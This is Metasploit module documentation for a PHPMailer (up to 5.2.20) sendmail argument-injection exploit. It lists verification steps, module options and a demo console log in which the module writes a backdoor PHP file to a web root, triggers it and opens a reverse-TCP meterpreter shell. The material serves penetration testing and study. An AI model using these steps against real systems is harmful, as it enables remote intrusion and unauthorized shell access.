dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md

3.3 KiB
Raw Permalink Blame History

Vulnerable Application

PHPMailer versions up to and including 5.2.20 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.

5.1.18 is also targeted.

Verification Steps

  1. Install a vulnerable PHPMailer
  2. Start msfconsole
  3. use exploit/multi/http/phpmailer_arg_injection
  4. Set the TARGETURI and WEB_ROOT options as applicable
  5. exploit
  6. Verify the module yields a PHP meterpreter session in < 5 minutes
  7. Verify the malicious PHP file was automatically removed

Options

WAIT_TIMEOUT

Seconds to wait to trigger the payload

NameField

Name of the element for the Name field

EmailField

Name of the element for the Email field

MessageField

Name of the element for the Message field

Scenarios

Demo taken directly from PR7768

msf (S:0 J:0) exploit(php_mailer) > options

Module options (exploit/linux/http/php_mailer):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST       192.168.90.134   yes       The target address
   RPORT       8080             yes       The target port
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Path to the application root
   TRIGGERURI                   no        Path to the uploaded payload
   VHOST                        no        HTTP server virtual host
   WEB_ROOT    /www             yes       Path to the web root



Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.90.134   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



msf (S:0 J:0) exploit(php_mailer) > rexploit
[*] Reloading module...

[*] [2016.12.29-17:03:47] Started reverse TCP handler on 192.168.90.134:4444
[*] [2016.12.29-17:03:47] Writing the backdoor to /www/0IxI5AFB.php
[*] [2016.12.29-17:04:07] Sleeping before requesting the written file
[*] [2016.12.29-17:04:07] Waiting for up to 300 seconds to trigger the payload
[+] [2016.12.29-17:04:48] Successfully found the payload
[*] [2016.12.29-17:05:50] Sending stage (34122 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (192.168.90.134:4444 -> 172.17.0.2:47280) at 2016-12-29 17:05:50 -0500
[+] [2016.12.29-17:05:50] Deleted /www/0IxI5AFB.php
[+] [2016.12.29-17:06:10] Successfully triggered the payload


meterpreter > sysinfo
Computer    : 90f0c8e8dbe4
OS          : Linux 90f0c8e8dbe4 4.8.15-200.fc24.x86_64 #1 SMP Thu Dec 15 23:09:22 UTC 2016 x86_64
Meterpreter : php/linux

meterpreter >